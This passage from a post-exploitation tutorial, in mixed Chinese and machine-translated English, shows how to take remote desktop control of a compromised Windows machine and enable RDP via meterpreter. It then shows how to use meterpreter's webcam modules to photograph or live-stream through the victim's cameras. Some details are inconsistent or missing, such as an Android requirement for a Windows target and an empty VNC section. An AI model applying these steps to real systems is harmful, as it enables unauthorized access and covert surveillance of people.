| 18 | wifi_list_shared:列出共享wifi配置文件/编码 |
22 后渗透之远程监控(Windows)
一、环境准备
1 rdesktop
在线安装 rdesktop
Debian,Ubuntu,kali下使用以下命令
apt-get install rdesktop
Centos/RedHat可以通过yum命令
yum -y install rdesktop
2 一台windiows靶机(没有物理电脑可以使用虚拟机代替)
3 MSF-Metasploit Framework
二、实战
1 使用rdesktop远程控制
说明:rdesktop是linux下支持Windows远程桌面连接的客户端程序,在linux系统下可通过它远程访问Windows桌面,支持多种版本。rdesktop是sourceforge下支持GPL协议的一个开源项目,采用RDP(Remote Desktop Protocol,远程桌面协议),几乎可以连接windows的所有版本
rdesktop常用参数
| id | 参数 | 描述 |
|---|---|---|
| 1 | -u | 账户名 |
| 2 | -p | 密码 |
| 3 | -a 16 | 指使用16位色显示远程画面 |
| 4 | -f | 全屏模式(用Ctrl+Alt+Enter 组合键退出全屏) |
| 5 | -g | 设置分辨率 如 : -g 1024x768 |
| 6 | rdesktop -h | 查看rdesktop使用帮助 |
rdesktop -u 用户名 -p 密码 -f IP
rdesktop -u mb -p 123456 -f -g 1024x720 192.168.110.24
If the remote computer does not start the remote function, we can enter in meterpreter
Start Remote Desktop Protocol: run post/windows/manage/enable_rdp
2 via vnc remote
23 Post-infiltration call camera
1. Environmental preparation
1 MSF-Metasploit Framework
2 A windows target machine
3 An Android device, no emulator available
Two, actual combat
After the target machine gets the meterpreter, we can use the webcam module to call the software and hardware cameras
The webcam module supports commands
| id | module name | explain |
|---|---|---|
| 1 | webcam_list | List all software and hardware cameras in the target machine, and number them |
| 2 | webcam_snap | A single software and hardware camera can be called to take pictures, and the first camera is called by default |
| 3 | webcam_stream | A single software and hardware camera can be called for live broadcast, and the first camera is called by default |
1 webcam_list
2 webcam_snap calls a single software and hardware camera to take pictures
| id | parameter | describe |
|---|---|---|
| 1 | -h | show help |
| 2 | -i | -i 1 "1" means calling the camera number |
| 3 | -p | -p /root "root" set the storage path |
| 4 | -q | -q 100 "100" means the quality of stored pictures is 50 by default |
| 5 | -v | -v false -v 2 parameters true and false This parameter indicates that it will be opened automatically after taking a photo, the default parameter is true |
3 webcam_stream calls a single software and hardware camera for live broadcast
| id | parameter | describe |
|---|---|---|
| 1 | -h | show help |
| 2 | -d | -d 100 "100"=100 seconds set stream duration to 100 seconds default 1800 |
| 3 | -i | -i 1 "1" means calling the camera number |
| 4 | -q | -q 100 "100" means the stream quality is 50 by default |
| 5 | -s | -s live "live" means that the stream file path is output in the current directory by default (note that the directory will not be created automatically if it does not exist) |
| 7 | -f | -f live "live" refers to the storage address of the playback file, which is output in the current directory by default |
| 8 | -v | -v false -v 2 parameters true and false This parameter indicates that it will be opened automatically after taking a photo, the default parameter is true |